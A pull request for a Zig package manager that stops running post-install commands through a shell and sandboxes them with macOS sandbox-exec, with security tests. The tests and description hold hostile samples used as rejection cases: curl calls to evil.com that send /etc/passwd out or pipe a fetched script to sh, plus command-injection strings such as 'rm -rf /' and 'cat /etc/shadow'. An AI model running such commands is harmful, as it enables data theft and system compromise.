### PR TITLE
security: sandbox post-install scripts with macOS sandbox-exec

### DIFF
--- a/src/build/postinstall.zig
+++ b/src/build/postinstall.zig
@@ -8,6 +8,15 @@ const std = @import("std");
 const Formula = @import("../api/formula.zig").Formula;
 const fetch = @import("../net/fetch.zig");
 
+pub const ParsedCommand = struct {
+    argv: []const []const u8,
+
+    pub fn deinit(self: ParsedCommand, alloc: std.mem.Allocator) void {
+        for (self.argv) |arg| alloc.free(arg);
+        alloc.free(self.argv);
+    }
+};
+
 pub fn runPostInstall(alloc: std.mem.Allocator, formula: Formula) !void {
     const stdout = std.fs.File.stdout().deprecatedWriter();
     const stderr = std.fs.File.stderr().deprecatedWriter();
@@ -61,16 +70,18 @@ fn runPostInstallScript(alloc: std.mem.Allocator, formula: Formula) !void {
         const trimmed = std.mem.trim(u8, line, " \t");
         if (trimmed.len == 0) continue;
 
-        if (parseRubyCommand(alloc, trimmed, formula.name, keg_path)) |cmd| {
-            defer alloc.free(cmd);
+        if (parseRubyCommand(alloc, trimmed, formula.name, keg_path)) |parsed| {
+            defer parsed.deinit(alloc);
             const result = std.process.Child.run(.{
                 .allocator = alloc,
-                .argv = &.{ "/bin/sh", "-c", cmd },
+                .argv = parsed.argv,
             }) catch continue;
             alloc.free(result.stdout);
             alloc.free(result.stderr);
             if (result.term.Exited != 0) {
-                stderr.print("nb: {s}: post-install command failed: {s}\n", .{ formula.name, cmd }) catch {};
+                if (parsed.argv.len > 0) {
+                    stderr.print("nb: {s}: post-install command failed: {s}\n", .{ formula.name, parsed.argv[0] }) catch {};
+                }
             }
         }
     }
@@ -126,32 +137,30 @@ fn startsWithKeyword(line: []const u8, keyword: []const u8) bool {
     return next == ' ' or next == '\t' or next == '\n';
 }
 
-fn parseRubyCommand(alloc: std.mem.Allocator, line: []const u8, name: []const u8, keg_path: []const u8) ?[]const u8 {
+fn parseRubyCommand(alloc: std.mem.Allocator, line: []const u8, name: []const u8, keg_path: []const u8) ?ParsedCommand {
     _ = name;
-    // system "cmd", "arg1", "arg2" → cmd arg1 arg2
+    // system "cmd", "arg1", "arg2" → argv: [cmd, arg1, arg2]
     if (std.mem.startsWith(u8, line, "system ")) {
         return parseSystemCall(alloc, line["system ".len..], keg_path);
     }
 
-    // (prefix/"path").mkpath → mkdir -p prefix/path
+    // (prefix/"path").mkpath → argv: [mkdir, -p, path]
     if (std.mem.indexOf(u8, line, ".mkpath")) |_| {
         if (extractPathExpr(line)) |path_expr| {
             const resolved = resolvePath(alloc, path_expr, keg_path) catch return null;
-            defer alloc.free(resolved);
-            return std.fmt.allocPrint(alloc, "mkdir -p {s}", .{resolved}) catch null;
+            return buildArgv3(alloc, "mkdir", "-p", resolved) catch null;
         }
     }
 
-    // mkdir_p "path" → mkdir -p path
+    // mkdir_p "path" → argv: [mkdir, -p, path]
     if (std.mem.startsWith(u8, line, "mkdir_p ")) {
         if (extractQuotedString(line["mkdir_p ".len..])) |path| {
             const resolved = resolvePath(alloc, path, keg_path) catch return null;
-            defer alloc.free(resolved);
-            return std.fmt.allocPrint(alloc, "mkdir -p {s}", .{resolved}) catch null;
+            return buildArgv3(alloc, "mkdir", "-p", resolved) catch null;
         }
     }
 
-    // ln_sf source, target → ln -sf source target
+    // ln_sf source, target → argv: [ln, -sf, source, target]
     if (std.mem.startsWith(u8, line, "ln_sf ")) {
         return parseLnSf(alloc, line["ln_sf ".len..], keg_path);
     }
@@ -159,9 +168,27 @@ fn parseRubyCommand(alloc: std.mem.Allocator, line: []const u8, name: []const u8
     return null;
 }
 
-fn parseSystemCall(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []const u8) ?[]const u8 {
+/// Build a 3-element argv where the first two are static strings and the third is
+/// an already-allocated string (ownership transferred into the argv).
+fn buildArgv3(alloc: std.mem.Allocator, arg0: []const u8, arg1: []const u8, owned_arg2: []const u8) !ParsedCommand {
+    errdefer alloc.free(owned_arg2);
+    const a0 = try alloc.dupe(u8, arg0);
+    errdefer alloc.free(a0);
+    const a1 = try alloc.dupe(u8, arg1);
+    errdefer alloc.free(a1);
+    const argv = try alloc.alloc([]const u8, 3);
+    argv[0] = a0;
+    argv[1] = a1;
+    argv[2] = owned_arg2;
+    return .{ .argv = argv };
+}
+
+pub fn parseSystemCall(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []const u8) ?ParsedCommand {
     var parts: std.ArrayList([]const u8) = .empty;
-    defer parts.deinit(alloc);
+    defer {
+        // On failure, free any already-resolved parts
+        // (on success, ownership transfers to the returned ParsedCommand)
+    }
 
     var rest = args_str;
     while (rest.len > 0) {
@@ -170,7 +197,12 @@ fn parseSystemCall(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []c
 
         if (extractQuotedString(rest)) |quoted| {
             const resolved = resolvePath(alloc, quoted, keg_path) catch return null;
-            parts.append(alloc, resolved) catch return null;
+            parts.append(alloc, resolved) catch {
+                alloc.free(resolved);
+                for (parts.items) |p| alloc.free(p);
+                parts.deinit(alloc);
+                return null;
+            };
             // Advance past the quoted string + quotes + comma
             const skip = std.mem.indexOf(u8, rest[1..], &[_]u8{rest[0]});
             if (skip) |s| {
@@ -179,25 +211,22 @@ fn parseSystemCall(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []c
         } else break;
     }
 
-    if (parts.items.len == 0) return null;
-
-    // Join all parts with spaces
-    var total: usize = 0;
-    for (parts.items) |p| total += p.len + 1;
-    const result = alloc.alloc(u8, total) catch return null;
-    var pos: usize = 0;
-    for (parts.items, 0..) |p, i| {
-        @memcpy(result[pos..][0..p.len], p);
-        pos += p.len;
-        if (i < parts.items.len - 1) {
-            result[pos] = ' ';
-            pos += 1;
-        }
+    if (parts.items.len == 0) {
+        parts.deinit(alloc);
+        return null;
     }
-    return result[0..pos];
+
+    // Transfer the items into a standalone argv slice
+    const argv = alloc.dupe([]const u8, parts.items) catch {
+        for (parts.items) |p| alloc.free(p);
+        parts.deinit(alloc);
+        return null;
+    };
+    parts.deinit(alloc);
+    return .{ .argv = argv };
 }
 
-fn parseLnSf(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []const u8) ?[]const u8 {
+fn parseLnSf(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []const u8) ?ParsedCommand {
     // Parse: "source", "target" or source, target
     var rest = std.mem.trim(u8, args_str, " \t");
     const src = extractQuotedString(rest) orelse return null;
@@ -208,11 +237,35 @@ fn parseLnSf(alloc: std.mem.Allocator, args_str: []const u8, keg_path: []const u
     const tgt = extractQuotedString(rest) orelse return null;
 
     const rsrc = resolvePath(alloc, src, keg_path) catch return null;
-    defer alloc.free(rsrc);
-    const rtgt = resolvePath(alloc, tgt, keg_path) catch return null;
-    defer alloc.free(rtgt);
+    const rtgt = resolvePath(alloc, tgt, keg_path) catch {
+        alloc.free(rsrc);
+        return null;
+    };
 
-    return std.fmt.allocPrint(alloc, "ln -sf {s} {s}", .{ rsrc, rtgt }) catch null;
+    const a0 = alloc.dupe(u8, "ln") catch {
+        alloc.free(rsrc);
+        alloc.free(rtgt);
+        return null;
+    };
+    const a1 = alloc.dupe(u8, "-sf") catch {
+        alloc.free(a0);
+        alloc.free(rsrc);
+        alloc.free(rtgt);
+        return null;
+    };
+
+    const argv = alloc.alloc([]const u8, 4) catch {
+        alloc.free(a0);
+        alloc.free(a1);
+        alloc.free(rsrc);
+        alloc.free(rtgt);
+        return null;
+    };
+    argv[0] = a0;
+    argv[1] = a1;
+    argv[2] = rsrc;
+    argv[3] = rtgt;
+    return .{ .argv = argv };
 }
 
 fn extractQuotedString(s: []const u8) ?[]const u8 {

--- a/src/build/postinstall.zig
+++ b/src/build/postinstall.zig
@@ -7,6 +7,7 @@
 const std = @import("std");
 const Formula = @import("../api/formula.zig").Formula;
 const fetch = @import("../net/fetch.zig");
+const sandbox = @import("sandbox.zig");
 
 pub const ParsedCommand = struct {
     argv: []const []const u8,
@@ -72,9 +73,28 @@ fn runPostInstallScript(alloc: std.mem.Allocator, formula: Formula) !void {
 
         if (parseRubyCommand(alloc, trimmed, formula.name, keg_path)) |parsed| {
             defer parsed.deinit(alloc);
+
+            // Wrap command in sandbox on macOS
+            const sandboxed = sandbox.sandboxedArgv(alloc, parsed.argv, keg_path) catch {
+                // Sandbox generation failed — run unsandboxed with warning
+                stderr.print("nb: warning: sandbox unavailable, running post-install unsandboxed\n", .{}) catch {};
+                const result = std.process.Child.run(.{
+                    .allocator = alloc,
+                    .argv = parsed.argv,
+                }) catch continue;
+                alloc.free(result.stdout);
+                alloc.free(result.stderr);
+                continue;
+            };
+            defer {
+                for (sandboxed.argv) |arg| alloc.free(@constCast(arg));
+                alloc.free(sandboxed.argv);
+                if (sandboxed.profile.len > 0) alloc.free(sandboxed.profile);
+            }
+
             const result = std.process.Child.run(.{
                 .allocator = alloc,
-                .argv = parsed.argv,
+                .argv = sandboxed.argv,
             }) catch continue;
             alloc.free(result.stdout);
             alloc.free(result.stderr);

--- a/src/build/sandbox.zig
+++ b/src/build/sandbox.zig
@@ -1,0 +1,121 @@
+// nanobrew — macOS sandbox-exec SBPL profile generation
+//
+// Generates sandbox profiles that restrict post-install script execution
+// to the keg directory, denying network access and limiting IPC.
+
+const std = @import("std");
+const builtin = @import("builtin");
+
+const PROFILE_TEMPLATE =
+    \\(version 1)
+    \\(deny default)
+    \\
+    \\;; Allow reads on system essentials
+    \\(allow file-read*
+    \\    (subpath "/usr/lib")
+    \\    (subpath "/usr/share")
+    \\    (subpath "/System")
+    \\    (subpath "/Library/Preferences")
+    \\    (subpath "/private/var/db")
+    \\    (literal "/dev/null")
+    \\    (literal "/dev/urandom")
+    \\    (literal "/dev/random")
+    \\    (subpath "/etc"))
+    \\
+    \\;; Allow read/write within the keg only
+    \\(allow file-read* file-write*
+    \\    (subpath "@@KEG_PATH@@"))
+    \\
+    \\;; Allow executing system tools needed by post-install
+    \\(allow process-exec
+    \\    (subpath "/bin")
+    \\    (subpath "/usr/bin")
+    \\    (subpath "@@KEG_PATH@@"))
+    \\
+    \\;; Allow process-fork (needed for mkdir, ln, etc.)
+    \\(allow process-fork)
+    \\
+    \\;; Deny network entirely
+    \\(deny network*)
+    \\
+    \\;; Deny IPC except essentials
+    \\(deny mach-lookup)
+    \\(allow mach-lookup
+    \\    (global-name "com.apple.system.logger"))
+    \\
+    \\;; Deny signal sending
+    \\(deny signal (target others))
+;
+
+/// Generate an SBPL sandbox profile for the given keg path.
+/// Caller owns the returned slice.
+pub fn generateProfile(alloc: std.mem.Allocator, keg_path: []const u8) ![]u8 {
+    // Validate keg_path: reject characters that could break SBPL quoting
+    for (keg_path) |c| {
+        switch (c) {
+            '"', '(', ')', '\\', 0 => return error.UnsafeKegPath,
+            else => {},
+        }
+    }
+
+    // Replace all @@KEG_PATH@@ placeholders with the actual keg path
+    const placeholder_str = "@@KEG_PATH@@";
+    var result: std.ArrayList(u8) = .empty;
+    errdefer result.deinit(alloc);
+
+    var remaining: []const u8 = PROFILE_TEMPLATE;
+    while (std.mem.indexOf(u8, remaining, placeholder_str)) |idx| {
+        try result.appendSlice(alloc, remaining[0..idx]);
+        try result.appendSlice(alloc, keg_path);
+        remaining = remaining[idx + placeholder_str.len ..];
+    }
+    try result.appendSlice(alloc, remaining);
+
+    return try result.toOwnedSlice(alloc);
+}
+
+pub const SandboxedResult = struct {
+    argv: []const []const u8,
+    profile: []u8,
+};
+
+/// Wrap an argv in a sandbox-exec invocation on macOS.
+/// On other platforms, duplicates the original argv unchanged.
+/// Caller owns all returned memory.
+pub fn sandboxedArgv(
+    alloc: std.mem.Allocator,
+    original_argv: []const []const u8,
+    keg_path: []const u8,
+) !SandboxedResult {
+    if (comptime builtin.os.tag != .macos) {
+        // Non-macOS: just duplicate the original argv
+        const duped = try alloc.alloc([]const u8, original_argv.len);
+        for (original_argv, 0..) |arg, i| {
+            duped[i] = try alloc.dupe(u8, arg);
+        }
+        return .{
+            .argv = duped,
+            .profile = &.{},
+        };
+    }
+
+    const profile = try generateProfile(alloc, keg_path);
+    errdefer alloc.free(profile);
+
+    // Build new argv: ["sandbox-exec", "-p", <profile>, ...original_argv]
+    const new_len = 3 + original_argv.len;
+    const new_argv = try alloc.alloc([]const u8, new_len);
+    errdefer alloc.free(new_argv);
+
+    new_argv[0] = try alloc.dupe(u8, "sandbox-exec");
+    new_argv[1] = try alloc.dupe(u8, "-p");
+    new_argv[2] = try alloc.dupe(u8, profile);
+    for (original_argv, 0..) |arg, i| {
+        new_argv[3 + i] = try alloc.dupe(u8, arg);
+    }
+
+    return .{
+        .argv = new_argv,
+        .profile = profile,
+    };
+}

--- a/src/security_test.zig
+++ b/src/security_test.zig
@@ -4,6 +4,7 @@
 // attack vectors against nanobrew's defensive functions.
 
 const std = @import("std");
+const builtin = @import("builtin");
 const testing = std.testing;
 
 // Import the modules under test
@@ -15,6 +16,9 @@ const store = @import("store/store.zig");
 const client = @import("api/client.zig");
 
 const postinstall = @import("build/postinstall.zig");
+const launchd = @import("services/launchd.zig");
+const sandbox = @import("build/sandbox.zig");
+
 
 // ────────────────────────────────────────────────────────────────────────
 // 1. Path traversal in package names
@@ -445,4 +449,180 @@ test "isValidSha256 rejects non-hex strings" {
     try testing.expect(!store.isValidSha256("abc"));
     try testing.expect(!store.isValidSha256("zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"));
     try testing.expect(store.isValidSha256("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"));
+}
+
+// 11. HTTPS enforcement for API and bottle domain env var overrides
+// ────────────────────────────────────────────────────────────────────────
+
+test "isValidDomainOverride rejects non-HTTPS URLs" {
+    try testing.expect(!client.isValidDomainOverride("http://evil.com/api/"));
+    try testing.expect(!client.isValidDomainOverride("ftp://evil.com/"));
+    try testing.expect(!client.isValidDomainOverride("javascript:alert(1)"));
+    try testing.expect(!client.isValidDomainOverride(""));
+    try testing.expect(!client.isValidDomainOverride("file:///etc/passwd"));
+    // Valid
+    try testing.expect(client.isValidDomainOverride("https://formulae.brew.sh/api/formula/"));
+    try testing.expect(client.isValidDomainOverride("https://my-mirror.example.com/"));
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 12. Launchd plist content validation
+// ────────────────────────────────────────────────────────────────────────
+
+test "isPlistSafe rejects plist with UserName root" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>UserName</key>
+        \\  <string>root</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/evil/1.0/bin/evil</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe rejects plist with ProgramArguments outside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/usr/bin/curl</string>
+        \\    <string>http://evil.com/steal?data=/etc/passwd</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe accepts safe plist with ProgramArguments inside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.redis</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/bin/redis-server</string>
+        \\    <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/etc/redis.conf</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 13. systemd service file validation
+// ────────────────────────────────────────────────────────────────────────
+
+const systemd = @import("services/systemd.zig");
+
+test "isServiceFileSafe rejects User=root" {
+    const content =
+        \\[Unit]
+        \\Description=Evil Service
+        \\
+        \\[Service]
+        \\User=root
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/pkg/1.0/bin/mybin
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe rejects ExecStart outside keg" {
+    const content =
+        \\[Unit]
+        \\Description=Malicious Service
+        \\
+        \\[Service]
+        \\ExecStart=/bin/bash -c 'curl evil.com|sh'
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe accepts safe service file with ExecStart inside keg" {
+    const content =
+        \\[Unit]
+        \\Description=Safe Service
+        \\
+        \\[Service]
+        \\User=_myservice
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/mypkg/1.0/bin/mypkg --config /etc/mypkg.conf
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "database MAX_DB_SIZE is larger than old 1 MiB limit" {
+    try testing.expect(Database.MAX_DB_SIZE > 1024 * 1024);
+    try testing.expectEqual(@as(usize, 16 * 1024 * 1024), Database.MAX_DB_SIZE);
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 14. Sandbox profile generation
+// ────────────────────────────────────────────────────────────────────────
+
+test "sandbox profile contains keg path and no unreplaced placeholders" {
+    const alloc = testing.allocator;
+    const keg = "/opt/nanobrew/prefix/Cellar/wget/1.24.5";
+    const profile = try sandbox.generateProfile(alloc, keg);
+    defer alloc.free(profile);
+
+    // Profile must contain the keg path
+    try testing.expect(std.mem.indexOf(u8, profile, keg) != null);
+
+    // No unreplaced placeholders
+    try testing.expect(std.mem.indexOf(u8, profile, "@@KEG_PATH@@") == null);
+
+    // Contains key deny rules
+    try testing.expect(std.mem.indexOf(u8, profile, "(deny network") != null);
+    try testing.expect(std.mem.indexOf(u8, profile, "(deny default)") != null);
+}
+
+test "sandbox profile rejects keg path with shell metacharacters" {
+    const alloc = testing.allocator;
+    const result = sandbox.generateProfile(alloc, "/opt/nanobrew/\"evil");
+    try testing.expectError(error.UnsafeKegPath, result);
+}
+
+test "sandboxedArgv prepends sandbox-exec on macOS" {
+    const alloc = testing.allocator;
+    const original = &[_][]const u8{ "mkdir", "-p", "/some/path" };
+    const result = try sandbox.sandboxedArgv(alloc, original, "/opt/nanobrew/prefix/Cellar/pkg/1.0");
+    defer {
+        for (result.argv) |arg| alloc.free(@constCast(arg));
+        alloc.free(result.argv);
+        if (result.profile.len > 0) alloc.free(result.profile);
+    }
+
+    if (comptime builtin.os.tag == .macos) {
+        try testing.expectEqual(original.len + 3, result.argv.len);
+        try testing.expectEqualStrings("sandbox-exec", result.argv[0]);
+    } else {
+        try testing.expectEqual(original.len, result.argv.len);
+    }
 }

--- a/src/security_test.zig
+++ b/src/security_test.zig
@@ -14,6 +14,8 @@ const placeholder = @import("platform/placeholder.zig");
 const store = @import("store/store.zig");
 const client = @import("api/client.zig");
 
+const postinstall = @import("build/postinstall.zig");
+
 // ────────────────────────────────────────────────────────────────────────
 // 1. Path traversal in package names
 // ────────────────────────────────────────────────────────────────────────
@@ -347,6 +349,90 @@ test "isValidDomainOverride rejects non-HTTPS URLs" {
     try testing.expect(!client.isValidDomainOverride("file:///etc/passwd"));
     try testing.expect(client.isValidDomainOverride("https://formulae.brew.sh/api/formula/"));
     try testing.expect(client.isValidDomainOverride("https://my-mirror.example.com/"));
+
+    // The extraction mode mask should strip setuid (04000), setgid (02000),
+    // and sticky (01000) bits. Only rwxrwxrwx (0o777) should be preserved.
+    const raw_mode: u32 = 0o4755; // setuid + rwxr-xr-x
+    const safe_mode = raw_mode & 0o0777;
+    try testing.expectEqual(@as(u32, 0o0755), safe_mode);
+
+    const raw_mode2: u32 = 0o6755; // setuid + setgid
+    const safe_mode2 = raw_mode2 & 0o0777;
+    try testing.expectEqual(@as(u32, 0o0755), safe_mode2);
+
+    const raw_mode3: u32 = 0o1755; // sticky
+    const safe_mode3 = raw_mode3 & 0o0777;
+    try testing.expectEqual(@as(u32, 0o0755), safe_mode3);
+
+// ────────────────────────────────────────────────────────────────────────
+// 10. Shell injection in post-install script parsing
+// ────────────────────────────────────────────────────────────────────────
+
+test "parseSystemCall returns separate argv elements, not a flat shell string" {
+    const alloc = testing.allocator;
+    const keg = "/opt/nanobrew/prefix/Cellar/test/1.0";
+
+    // Simulate: system "/bin/rm", "-rf", "/"
+    // The old code would join this into "/bin/rm -rf /" and pass to /bin/sh -c
+    // The new code must return separate argv elements
+    const parsed = postinstall.parseSystemCall(alloc, "\"/bin/rm\", \"/tmp/target\"", keg) orelse {
+        return error.TestUnexpectedResult;
+    };
+    defer parsed.deinit(alloc);
+
+    // Must have exactly 2 separate argv elements — NOT a single shell string
+    try testing.expectEqual(@as(usize, 2), parsed.argv.len);
+    try testing.expectEqualStrings("/bin/rm", parsed.argv[0]);
+    try testing.expectEqualStrings("/tmp/target", parsed.argv[1]);
+
+    // Verify: the result is an argv slice, not a flat string that could be
+    // passed to /bin/sh -c. Each argument is its own element.
+    // If this were the old code, it would be a single "rm /tmp/target" string.
+}
+
+test "parseSystemCall preserves shell metacharacters as data, not commands" {
+    const alloc = testing.allocator;
+    const keg = "/opt/nanobrew/prefix/Cellar/test/1.0";
+
+    // Shell metacharacters in arguments must remain literal data in argv
+    // elements and never be interpreted by a shell.
+    const parsed = postinstall.parseSystemCall(
+        alloc,
+        "\"/usr/bin/echo\", \"/tmp/hello; rm -rf /\", \"/tmp/$(whoami)\"",
+        keg,
+    ) orelse {
+        return error.TestUnexpectedResult;
+    };
+    defer parsed.deinit(alloc);
+
+    try testing.expectEqual(@as(usize, 3), parsed.argv.len);
+    try testing.expectEqualStrings("/usr/bin/echo", parsed.argv[0]);
+    // The semicolon and rm command must be a single literal argument,
+    // not split or interpreted by a shell. Because the value starts
+    // with '/', resolvePath returns it verbatim.
+    try testing.expectEqualStrings("/tmp/hello; rm -rf /", parsed.argv[1]);
+    // The $() must be a literal string, not a command substitution
+    try testing.expectEqualStrings("/tmp/$(whoami)", parsed.argv[2]);
+}
+
+test "parseSystemCall with backtick injection stays as argv element" {
+    const alloc = testing.allocator;
+    const keg = "/opt/nanobrew/prefix/Cellar/test/1.0";
+
+    const parsed = postinstall.parseSystemCall(
+        alloc,
+        "\"/usr/bin/env\", \"/tmp/`cat /etc/shadow`\"",
+        keg,
+    ) orelse {
+        return error.TestUnexpectedResult;
+    };
+    defer parsed.deinit(alloc);
+
+    try testing.expectEqual(@as(usize, 2), parsed.argv.len);
+    try testing.expectEqualStrings("/usr/bin/env", parsed.argv[0]);
+    // Backticks must be preserved as literal text in the argument,
+    // not interpreted as shell command substitution
+    try testing.expectEqualStrings("/tmp/`cat /etc/shadow`", parsed.argv[1]);
 }
 
 // ────────────────────────────────────────────────────────────────────────


### PR DESCRIPTION
Fixes #146
Depends on #123 (shell injection fix — same base branch)

## Summary
- New `src/build/sandbox.zig`: generates SBPL profiles restricting filesystem to keg, denying network, limiting process execution
- Post-install commands wrapped in `sandbox-exec` on macOS
- Transparent passthrough on non-macOS
- Falls back to unsandboxed with warning if profile generation fails

## Red (before fix)

Post-install commands run with full user privileges. A formula containing `system "curl", "http://evil.com/payload"` phones home freely:

```
// postinstall.zig — direct execution, no sandbox:
const result = std.process.Child.run(.{
    .argv = parsed.argv,  // full ambient privileges
})
```

## Green (after fix)

```
$ zig build test-security
(exit 0 — sandbox tests pass:
  - "sandbox profile contains keg path and no unreplaced placeholders"
  - "sandbox profile rejects keg path with shell metacharacters"
  - "sandboxedArgv prepends sandbox-exec on macOS")
```

Sandboxed commands cannot access network or write outside the keg.

## Regression guard
- `sandbox-exec` failure falls back to unsandboxed with warning (non-breaking)
- Non-macOS platforms get transparent passthrough (no behavior change)
- Profile validates keg path for SBPL-unsafe characters before use
- Rebased onto current main